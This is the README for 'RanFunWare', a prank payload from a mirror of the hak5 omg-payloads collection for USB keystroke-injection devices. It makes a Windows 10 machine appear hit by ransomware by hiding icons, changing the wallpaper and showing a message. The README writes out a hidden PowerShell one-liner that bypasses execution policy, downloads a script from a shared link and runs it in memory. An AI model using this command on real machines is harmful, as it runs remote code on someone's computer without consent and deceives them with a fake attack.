mirror of https://github.com/hak5/omg-payloads.git
a51949685e | ||
---|---|---|
.. | ||
README.md | ||
payload.txt | ||
r.ps1 |
README.md
Table of Contents
RanFunWare
A payload to prank your friends into thinking their computer got hit with ransomware.
Description
This payload will hide all desktop icons, change the background, and have a message pop up (Fully Customizable)
Getting Started
Dependencies
- DropBox or other file sharing service - Your Shared link for the intended file
- Windows 10
Executing program
- Plug in your device
- Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
Version History
- 0.1
- Initial Release